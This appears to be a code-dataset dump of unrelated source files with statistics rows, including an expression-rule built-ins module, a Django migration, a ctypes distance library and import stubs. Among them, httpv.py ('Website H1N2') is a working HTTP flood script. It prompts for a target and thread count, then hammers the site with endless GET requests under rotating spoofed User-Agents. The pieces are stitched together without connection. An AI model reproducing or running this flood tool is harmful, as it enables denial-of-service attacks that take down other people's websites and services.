interp_aperp = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_aperp]
return [interp_f, interp_aperp, interp_apar]
# Precompute cosmo functions
cosmo_fns = rf.background_evolution_splines(cosmo)
# OLD
old_f, old_aperp, old_apar = old_eos_fisher_matrix_derivs(cosmo, cosmo_fns)
# NEW
new_f, new_aperp, new_apar = eos_fisher_matrix_derivs(cosmo, cosmo_fns)
z = np.linspace(0., 7., 1000)
a = 1. / (1. + z)
# Plot results
P.subplot(111)
cols = ['r', 'g', 'b', 'y', 'c', 'm']
for i in range(len(new_f)):
P.plot(z, old_f[i](a), lw=1.5, color=cols[i], alpha=0.4)
P.plot(z, new_f[i](a), lw=1.5, color=cols[i], ls='dashed')
P.show()
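# Aside (illustrative, not part of the original test script): the only coded
# difference between the "old" and "new" derivative functions above is that the
# old cumtrapz calls omit the sample points `aa`, so they integrate against
# unit spacing instead of d(a). A minimal trapezoid-rule sketch (hypothetical
# helper name) shows why passing the x-array matters:
def _trapz(y, x=None):
    """Trapezoidal integral of samples y over x (unit spacing if x is None)."""
    if x is None:
        x = list(range(len(y)))  # what cumtrapz assumes when x is omitted
    return sum((y[i] + y[i + 1]) * (x[i + 1] - x[i]) / 2.0
               for i in range(len(y) - 1))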
| 38.471963 | 86 | 0.578647 | 1,378 | 8,233 | 3.333091 | 0.146589 | 0.027433 | 0.017418 | 0.019595 | 0.905726 | 0.902678 | 0.902678 | 0.895275 | 0.886567 | 0.879164 | 0 | 0.034393 | 0.251306 | 8,233 | 213 | 87 | 38.652582 | 0.71074 | 0.205029 | 0 | 0.796748 | 0 | 0 | 0.019729 | 0 | 0 | 0 | 0 | 0.00939 | 0 | 0 | null | null | 0 | 0.04878 | null | null | 0.01626 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fcd10f5842db157a8c3666b3aabeb98b2e774cd5 | 11,043 | py | Python | adoctor-check-executor/adoctor_check_executor/check_rule_plugins/expression_parser/builtin_function.py | seandong37tt4qu/jeszhengq | 32b3737ab45e89e8c5b71cdce871cefd2c938fa8 | [
"MulanPSL-1.0"
] | null | null | null | adoctor-check-executor/adoctor_check_executor/check_rule_plugins/expression_parser/builtin_function.py | seandong37tt4qu/jeszhengq | 32b3737ab45e89e8c5b71cdce871cefd2c938fa8 | [
"MulanPSL-1.0"
] | null | null | null | adoctor-check-executor/adoctor_check_executor/check_rule_plugins/expression_parser/builtin_function.py | seandong37tt4qu/jeszhengq | 32b3737ab45e89e8c5b71cdce871cefd2c938fa8 | [
"MulanPSL-1.0"
] | null | null | null | #!/usr/bin/python3
# ******************************************************************************
# Copyright (c) Huawei Technologies Co., Ltd. 2021-2021. All rights reserved.
# licensed under the Mulan PSL v2.
# You can use this software according to the terms and conditions of the Mulan PSL v2.
# You may obtain a copy of Mulan PSL v2 at:
# http://license.coscl.org.cn/MulanPSL2
# THIS SOFTWARE IS PROVIDED ON AN 'AS IS' BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v2 for more details.
# ******************************************************************************/
"""
Author: YangYunYi
Date: 2021/8/5 15:17
docs: parser.py
description: built-in functions for expression check rules
"""
import operator
from adoctor_check_executor.common.check_error import ExpressionFunctionError
def get_operator_function(op_sign):
"""
Get operator function from sign
Args:
op_sign (str): operator sign
Returns:
operator function
"""
return {
'>': operator.gt,
'<': operator.lt,
'>=': operator.ge,
'<=': operator.le,
'==': operator.eq,
'!=': operator.ne,
}[op_sign]
def builtin_count(target, args_list, data_backpack):
"""
Built-in function of Count
Args:
target (str): target data name
args_list(list): argument list [time_shift, data_item, operator]
data_backpack (DataBackpack): data cache
Returns:
count result (int)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 3:
raise ExpressionFunctionError("Invalid num of arguments, %s" % args_list)
time_shift = args_list[0].calculate(data_backpack)
data_pattern = args_list[1].calculate(data_backpack)
judge_op = args_list[2].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
try:
ret = 0
cur_time_stamp = data_backpack.get_time_stamp(data_backpack.target_index, data_name)
shift_time_stamp = cur_time_stamp - time_shift
index = data_backpack.target_index
while index >= 0:
if data_backpack.get_time_stamp(index, data_name) < shift_time_stamp:
break
if get_operator_function(judge_op)(
data_backpack.get_data_value(index, data_name),
data_pattern):
ret += 1
index -= 1
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return ret
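# Standalone sketch (illustrative, hypothetical data layout rather than the
# executor's DataBackpack): builtin_count above is a reverse scan over the
# sample history that stops once a timestamp drops out of the time window and
# counts the samples satisfying the comparison.
def _window_count(samples, now, window, op, threshold):
    """samples: list of (timestamp, value) pairs in ascending timestamp order."""
    count = 0
    for ts, value in reversed(samples):
        if ts < now - window:
            break  # outside the window; earlier samples are older still
        if op(value, threshold):
            count += 1
    return count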
def builtin_max(target, args_list, data_backpack):
"""
Built-in function of Max
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
max result (float)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
time_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
ret = float('-inf')
try:
cur_time_stamp = data_backpack.get_time_stamp(data_backpack.target_index, data_name)
shift_time_stamp = cur_time_stamp - time_shift
index = data_backpack.target_index
while index >= 0:
if data_backpack.get_time_stamp(index, data_name) < shift_time_stamp:
break
ret = max(data_backpack.get_data_value(index, data_name), ret)
index -= 1
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return ret
def builtin_min(target, args_list, data_backpack):
"""
Built-in function of min
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
min result (float)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
time_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
ret = float('inf')
try:
cur_time_stamp = data_backpack.get_time_stamp(data_backpack.target_index, data_name)
shift_time_stamp = cur_time_stamp - time_shift
index = data_backpack.target_index
while index >= 0:
if data_backpack.get_time_stamp(index, data_name) < shift_time_stamp:
break
ret = min(data_backpack.get_data_value(index, data_name), ret)
index -= 1
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return ret
def builtin_sum(target, args_list, data_backpack):
"""
Built-in function of sum
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
sum result (float)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
time_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
ret = 0
try:
cur_time_stamp = data_backpack.get_time_stamp(data_backpack.target_index, data_name)
shift_time_stamp = cur_time_stamp - time_shift
index = data_backpack.target_index
while index >= 0:
if data_backpack.get_time_stamp(index, data_name) < shift_time_stamp:
break
ret += data_backpack.get_data_value(index, data_name)
index -= 1
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return ret
def builtin_avg(target, args_list, data_backpack):
"""
Built-in function of average
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
average result (float)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
time_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
sum_value = 0
try:
cur_time_stamp = data_backpack.get_time_stamp(data_backpack.target_index, data_name)
shift_time_stamp = cur_time_stamp - time_shift
index = data_backpack.target_index
count = 0  # number of samples actually inside the time window
while index >= 0:
if data_backpack.get_time_stamp(index, data_name) < shift_time_stamp:
break
sum_value += data_backpack.get_data_value(index, data_name)
count += 1
index -= 1
ret = sum_value / count if count else 0
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return ret
def builtin_keyword(target, args_list, data_backpack):
"""
Built-in function of Keyword
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
Keyword result (bool)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
keyword = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
try:
data_value = data_backpack.get_data_value(data_backpack.target_index, data_name)
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return data_value.find(keyword) != -1
def builtin_diff(target, args_list, data_backpack):
"""
Built-in function of Diff
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
Diff result (bool)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
num_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
if data_backpack.target_index == 0:
raise ExpressionFunctionError("Invalid index is 0")
try:
data_value = data_backpack.get_data_value(data_backpack.target_index, data_name)
pre_data_value = data_backpack.get_data_value(
data_backpack.target_index - num_shift,
data_name)
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return data_value != pre_data_value
def builtin_abschange(target, args_list, data_backpack):
"""
Built-in function of abschange
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
        Absolute difference between the current and the shifted value (number)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
num_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
    if data_backpack.target_index < num_shift:
        raise ExpressionFunctionError("Invalid index: not enough history for the requested shift")
try:
data_value = data_backpack.get_data_value(data_backpack.target_index, data_name)
pre_data_value = data_backpack.get_data_value(
data_backpack.target_index - num_shift,
data_name)
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return abs(data_value - pre_data_value)
def builtin_change(target, args_list, data_backpack):
"""
    Built-in function of change
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
        Difference between the current and the shifted value (number)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
num_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
    if data_backpack.target_index < num_shift:
        raise ExpressionFunctionError("Invalid index: not enough history for the requested shift")
try:
data_value = data_backpack.get_data_value(data_backpack.target_index, data_name)
pre_data_value = data_backpack.get_data_value(
data_backpack.target_index - num_shift,
data_name)
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return data_value - pre_data_value
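These built-ins all follow the same shape: resolve the data name, read the cached value at `target_index` (and a shifted one), and wrap any lookup failure in `ExpressionFunctionError`. A minimal self-contained sketch of the `change`-style computation — `StubBackpack` and `Const` below are hypothetical stand-ins for the module's real `DataBackpack` and parsed-argument classes, not its API:

```python
class ExpressionFunctionError(Exception):
    """Raised when a built-in expression function cannot be evaluated."""


class StubBackpack(object):
    """Hypothetical stand-in for DataBackpack: one cached value series."""

    def __init__(self, values, target_index):
        self._values = values
        self.target_index = target_index

    def get_key_data_name(self, target):
        return target

    def get_data_value(self, index, data_name):
        if index < 0 or index >= len(self._values):
            raise ExpressionFunctionError("no value at index %d" % index)
        return self._values[index]


class Const(object):
    """Stand-in for a parsed argument node whose calculate() is a constant."""

    def __init__(self, value):
        self.value = value

    def calculate(self, data_backpack):
        return self.value


def change(target, args_list, data_backpack):
    """Same shape as builtin_change: current value minus shifted value."""
    num_shift = args_list[0].calculate(data_backpack)
    data_name = data_backpack.get_key_data_name(target)
    cur = data_backpack.get_data_value(data_backpack.target_index, data_name)
    pre = data_backpack.get_data_value(data_backpack.target_index - num_shift, data_name)
    return cur - pre


backpack = StubBackpack([10, 13, 9], target_index=2)
delta = change("cpu", [Const(1)], backpack)  # 9 - 13 = -4
```

A shift larger than the available history raises `ExpressionFunctionError`, which is the error the real built-ins re-wrap as "calculate failed, ...".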
| 31.551429 | 98 | 0.659603 | 1,342 | 11,043 | 5.170641 | 0.123696 | 0.138348 | 0.067013 | 0.066292 | 0.846231 | 0.84162 | 0.828073 | 0.822165 | 0.809627 | 0.760052 | 0 | 0.007824 | 0.247668 | 11,043 | 349 | 99 | 31.641834 | 0.827395 | 0.262248 | 0 | 0.733333 | 0 | 0 | 0.061376 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.012121 | 0 | 0.139394 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fce01480e3edcfc771b7e73f762f26733961d3cc | 121 | py | Python | __init__.py | rhedgeco/general-falcon-webserver | 6a30b56906901de260984e1d808ff5b8943e1206 | [
"MIT"
] | null | null | null | __init__.py | rhedgeco/general-falcon-webserver | 6a30b56906901de260984e1d808ff5b8943e1206 | [
"MIT"
] | null | null | null | __init__.py | rhedgeco/general-falcon-webserver | 6a30b56906901de260984e1d808ff5b8943e1206 | [
"MIT"
] | null | null | null | from .backend.general_manager.app_constructor import WebApp
from .backend.general_manager.databases import SqliteDatabase | 60.5 | 61 | 0.892562 | 15 | 121 | 7 | 0.666667 | 0.209524 | 0.342857 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057851 | 121 | 2 | 61 | 60.5 | 0.921053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
1e3b179f4869466dc8f692bb4f89c1781454507e | 188 | py | Python | handlers/errors/__init__.py | bbt-t/bot-pet-project | 6b0d7862b14fe739be52d87ff8c8610a3f4548e1 | [
"Apache-2.0"
] | null | null | null | handlers/errors/__init__.py | bbt-t/bot-pet-project | 6b0d7862b14fe739be52d87ff8c8610a3f4548e1 | [
"Apache-2.0"
] | null | null | null | handlers/errors/__init__.py | bbt-t/bot-pet-project | 6b0d7862b14fe739be52d87ff8c8610a3f4548e1 | [
"Apache-2.0"
] | null | null | null | from .exception_botblocked import dp
from .exception_messagecantedit import dp
from .exception_messagemotmodified import dp
from .exception_messagecantbedeleted import dp
__all__ = ['dp'] | 31.333333 | 46 | 0.851064 | 22 | 188 | 6.909091 | 0.409091 | 0.342105 | 0.236842 | 0.414474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101064 | 188 | 6 | 47 | 31.333333 | 0.899408 | 0 | 0 | 0 | 0 | 0 | 0.010582 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1e9555e017ba7ff0809db2f7b4ef9991b9999cc5 | 2,649 | py | Python | Python/httpv.py | johnmelodyme/viruses | c8c4b628a6ae725a45312b4365fa8a6876509706 | [
"BSD-2-Clause"
] | 4 | 2018-11-15T08:23:06.000Z | 2019-04-29T13:30:44.000Z | Python/httpv.py | johnmelodyme/Viruses | c8c4b628a6ae725a45312b4365fa8a6876509706 | [
"BSD-2-Clause"
] | null | null | null | Python/httpv.py | johnmelodyme/Viruses | c8c4b628a6ae725a45312b4365fa8a6876509706 | [
"BSD-2-Clause"
] | 2 | 2019-02-13T19:53:26.000Z | 2021-05-30T19:04:43.000Z | import threading
import requests
import sys
import random
print '''########################################
############## Website H1N2 ##########
############## by John Melody #########
###############################'''
host = raw_input("Url/ip:")
thread_num = input("threads:")
user_agent = [
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
def run():
if len(sys.argv)>=1:
url="http://"+host
print "Attacking",host
while True:
headers={'User-Agent': random.choice(user_agent)}
r = requests.get(url,headers=headers)
else:
        print "It only works on HTTP servers!!!"
for i in range(thread_num):
th = threading.Thread(target = run)
th.start() | 57.586957 | 122 | 0.650057 | 465 | 2,649 | 3.683871 | 0.215054 | 0.084063 | 0.094571 | 0.210158 | 0.748395 | 0.747227 | 0.7338 | 0.708698 | 0.654991 | 0.55108 | 0 | 0.178887 | 0.145338 | 2,649 | 46 | 123 | 57.586957 | 0.577739 | 0 | 0 | 0 | 0 | 0.428571 | 0.798464 | 0.027255 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.095238 | null | null | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1ecf8b30782b6a52d6d51ab78460e3504bce895b | 8,198 | py | Python | trendapp/migrations/0001_initial.py | Madjura/klang-thesis | 33c1cfe707faede34dad8719c4c018c8354a8d9e | [
"MIT"
] | null | null | null | trendapp/migrations/0001_initial.py | Madjura/klang-thesis | 33c1cfe707faede34dad8719c4c018c8354a8d9e | [
"MIT"
] | null | null | null | trendapp/migrations/0001_initial.py | Madjura/klang-thesis | 33c1cfe707faede34dad8719c4c018c8354a8d9e | [
"MIT"
] | null | null | null | # Generated by Django 3.0.2 on 2020-09-28 16:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Feed',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('channel_title', models.TextField(null=True)),
('channel_link', models.TextField(null=True)),
('channel_description', models.TextField(null=True)),
('channel_language', models.CharField(max_length=20, null=True)),
('channel_lastBuildDate', models.DateTimeField(null=True)),
('item_title', models.TextField(null=True)),
('item_link', models.TextField(null=True)),
('item_description', models.TextField(null=True)),
('item_pubDate', models.DateTimeField(null=True)),
('item_guid', models.TextField(null=True, unique=True)),
('topic', models.TextField(null=True)),
('item_webpage', models.TextField(null=True)),
],
),
migrations.CreateModel(
name='StoreUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id', models.IntegerField(null=True, unique=True)),
('name', models.TextField(null=True)),
('screen_name', models.TextField(null=True)),
('location', models.TextField(null=True)),
('description', models.TextField(null=True)),
('url', models.TextField(null=True)),
('protected', models.BooleanField(null=True)),
('followers_count', models.IntegerField(null=True)),
('friends_count', models.IntegerField(null=True)),
('listed_count', models.IntegerField(null=True)),
('created_at', models.DateTimeField(null=True)),
('favourites_count', models.IntegerField(null=True)),
('geo_enabled', models.BooleanField(null=True)),
('verified', models.BooleanField(null=True)),
('statuses_count', models.IntegerField(null=True)),
('lang', models.CharField(max_length=20, null=True)),
],
),
migrations.CreateModel(
name='Tweet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tweet_id', models.IntegerField(unique=True)),
('created_at', models.DateTimeField(null=True)),
('text', models.TextField(null=True)),
('truncated', models.BooleanField(null=True)),
('source', models.TextField(null=True)),
('in_reply_to_status_id', models.IntegerField(null=True)),
('in_reply_to_user_id', models.IntegerField(null=True)),
('in_reply_to_screen_name', models.TextField(null=True)),
('retweet_count', models.IntegerField(null=True)),
('favorite_count', models.IntegerField(null=True)),
('lang', models.CharField(max_length=20, null=True)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id', models.IntegerField(null=True, unique=True)),
('name', models.TextField(null=True)),
('screen_name', models.TextField(null=True)),
('location', models.TextField(null=True)),
('description', models.TextField(null=True)),
('url', models.TextField(null=True)),
('protected', models.BooleanField(null=True)),
('followers_count', models.IntegerField(null=True)),
('friends_count', models.IntegerField(null=True)),
('listed_count', models.IntegerField(null=True)),
('created_at', models.DateTimeField(null=True)),
('favourites_count', models.IntegerField(null=True)),
('geo_enabled', models.BooleanField(null=True)),
('verified', models.BooleanField(null=True)),
('statuses_count', models.IntegerField(null=True)),
('lang', models.CharField(max_length=20, null=True)),
],
),
migrations.CreateModel(
name='TweetUrl',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.TextField(null=True)),
('expanded_url', models.TextField(null=True)),
('display_url', models.TextField(null=True)),
('beginning', models.IntegerField(null=True)),
('end', models.IntegerField(null=True)),
('tweet', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trendapp.Tweet')),
],
),
migrations.AddField(
model_name='tweet',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trendapp.User'),
),
migrations.CreateModel(
name='StoreTweet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tweet_id', models.IntegerField(unique=True)),
('created_at', models.DateTimeField(null=True)),
('text', models.TextField(null=True)),
('truncated', models.BooleanField(null=True)),
('source', models.TextField(null=True)),
('in_reply_to_status_id', models.IntegerField(null=True)),
('in_reply_to_user_id', models.IntegerField(null=True)),
('in_reply_to_screen_name', models.TextField(null=True)),
('retweet_count', models.IntegerField(null=True)),
('favorite_count', models.IntegerField(null=True)),
('lang', models.CharField(max_length=20, null=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trendapp.StoreUser')),
],
),
migrations.CreateModel(
name='Mention',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('beginning', models.IntegerField(null=True)),
('end', models.IntegerField(null=True)),
('screen_name', models.TextField(null=True)),
('name', models.TextField(null=True)),
('mention_id', models.IntegerField(null=True)),
('tweet', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trendapp.Tweet')),
],
),
migrations.CreateModel(
name='Hashtag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('beginning', models.IntegerField(null=True)),
('end', models.IntegerField(null=True)),
('tag', models.TextField(default='')),
('tweet', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trendapp.Tweet')),
],
),
migrations.CreateModel(
name='FeedContent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.TextField()),
('content', models.TextField()),
('feed', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='trendapp.Feed')),
],
),
]
| 50.919255 | 114 | 0.559039 | 773 | 8,198 | 5.794308 | 0.135834 | 0.135745 | 0.127261 | 0.154052 | 0.8714 | 0.779192 | 0.773164 | 0.765573 | 0.758205 | 0.747712 | 0 | 0.004293 | 0.289705 | 8,198 | 160 | 115 | 51.2375 | 0.764898 | 0.005489 | 0 | 0.732026 | 1 | 0 | 0.128696 | 0.013373 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.013072 | 0 | 0.039216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
44cc0bfb8ba53472205bea37798cdc7915a3e1ed | 4,550 | py | Python | pyckmeans/distance/c_interop.py | TankredO/pyckmeans | c8672b94cd75aadf6c4abc508f49107a4aedb86c | [
"MIT"
] | 9 | 2021-09-05T10:34:05.000Z | 2021-12-21T10:33:09.000Z | pyckmeans/distance/c_interop.py | TankredO/pyckmeans | c8672b94cd75aadf6c4abc508f49107a4aedb86c | [
"MIT"
] | null | null | null | pyckmeans/distance/c_interop.py | TankredO/pyckmeans | c8672b94cd75aadf6c4abc508f49107a4aedb86c | [
"MIT"
] | null | null | null | import ctypes
import pathlib
import numpy
# load the shared library
libfile = pathlib.Path(__file__).parent / 'lib' / 'distance.so'
lib = ctypes.CDLL(str(libfile))
# == p distance
lib.pDistance.restype = None
lib.pDistance.argtypes = [
numpy.ctypeslib.ndpointer( # alignment: n * m matrix
dtype=numpy.uint8,
ndim=2,
flags='C_CONTIGUOUS',
),
ctypes.c_int, # n: number of entries
ctypes.c_int, # m: number of sites
ctypes.c_int, # pairwiseDeletion
    numpy.ctypeslib.ndpointer( # (output) distMat: n * n distance matrix
dtype=numpy.double,
ndim=2,
flags='C_CONTIGUOUS',
),
]
def p_distance(
alignment: numpy.ndarray,
pairwise_deletion: bool = True,
) -> numpy.ndarray:
'''p_distance
Calculate p-distance for a nucleotide alignment.
Parameters
----------
alignment : numpy.ndarray
n*m numpy alignment, where n is the number of entries and m is
the number of sites. Bases must be encoded in the format of
pyckmeans.io.NucleotideAlignment.
pairwise_deletion : bool, optional
Calculate distances with pairwise-deletion in case of missing
data, by default True
Returns
-------
numpy.ndarray
n*n distance matrix.
'''
if not alignment.flags['C_CONTIGUOUS']:
alignment = numpy.ascontiguousarray(alignment)
n, m = alignment.shape
dist_mat = numpy.zeros((n, n), dtype=numpy.double)
lib.pDistance(alignment, n, m, pairwise_deletion, dist_mat)
return dist_mat
# == Jukes-Cantor distance
lib.jcDistance.restype = None
lib.jcDistance.argtypes = [
numpy.ctypeslib.ndpointer( # alignment: n * m matrix
dtype=numpy.uint8,
ndim=2,
flags='C_CONTIGUOUS',
),
ctypes.c_int, # n: number of entries
ctypes.c_int, # m: number of sites
ctypes.c_int, # pairwiseDeletion
    numpy.ctypeslib.ndpointer( # (output) distMat: n * n distance matrix
dtype=numpy.double,
ndim=2,
flags='C_CONTIGUOUS',
),
]
def jc_distance(
alignment: numpy.ndarray,
pairwise_deletion: bool = True,
) -> numpy.ndarray:
'''jc_distance
Calculate Jukes-Cantor distance for a nucleotide alignment.
Parameters
----------
alignment : numpy.ndarray
n*m numpy alignment, where n is the number of entries and m is
the number of sites. Bases must be encoded in the format of
pyckmeans.io.NucleotideAlignment.
pairwise_deletion : bool, optional
